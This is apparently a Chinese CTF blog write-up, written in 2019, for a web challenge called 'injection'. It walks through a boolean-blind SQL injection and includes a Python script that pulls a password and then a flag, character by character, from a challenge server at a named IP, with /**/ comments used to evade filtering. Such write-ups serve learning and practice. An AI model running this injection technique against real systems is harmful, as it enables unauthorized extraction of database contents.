injection

web sql-injection

字数统计: 235阅读时长: 1 min

 2019/10/07   Share

题目地址
给了源代码，在index.php.bak
根据代码，payload = ?token=21232f297a57a5a743894a0e4a801fc3&userid=&password=
这题时间盲注（虽然sleep不可用，但也有其他方法来实现）和bool盲注都可以，但推荐bool盲注(条件写的很清楚)

先得password

#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{} _@'  #最好ascii 遍历

flag=''

for x in xrange(0,50):
	for i in dic:
		url = 'http://106.12.37.37:8080/level2/?token=21232f297a57a5a743894a0e4a801fc3&userid=(ascii(substr((select/**/password/**/from/**/user)/**/from/**/%d/**/for/**/1))=%d)&password=1' %(x,ord(i))
		try:
			response = requests.get(url,timeout=3)
			if response.content.find('error password!')!=-1:
				flag = flag + i
				print flag
				break
		except Exception,e:
			pass
print flag

得到password,后reponse 为error sql!。根据代码更改payload?token=21232f297a57a5a743894a0e4a801fc3&userid=1&password=219d03ad2d752ad2806ea1de18613158&infoid=1

reponse 为flag is in flag!

再读取flag

1
2
3

....
		url = 'http://106.12.37.37:8080/level2/?token=21232f297a57a5a743894a0e4a801fc3&userid=(ascii(substr((select/**/flag/**/from/**/flag)/**/from/**/%d/**/for/**/1))=%d)&password=1' %(x,ord(i))
....

便可得到flag
1
flag{b75079652c058c54f066e158727cd494}

原文作者：fe1w0

原文链接：https://fe1w0.github.io/2019/10/07/injection/

发表日期：October 7th 2019, 2:44:26 pm

更新日期：March 15th 2021, 12:21:12 am

Next Post

回顾与反省
Previous Post

CUMTCTF2019-FINAL

CATALOG



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true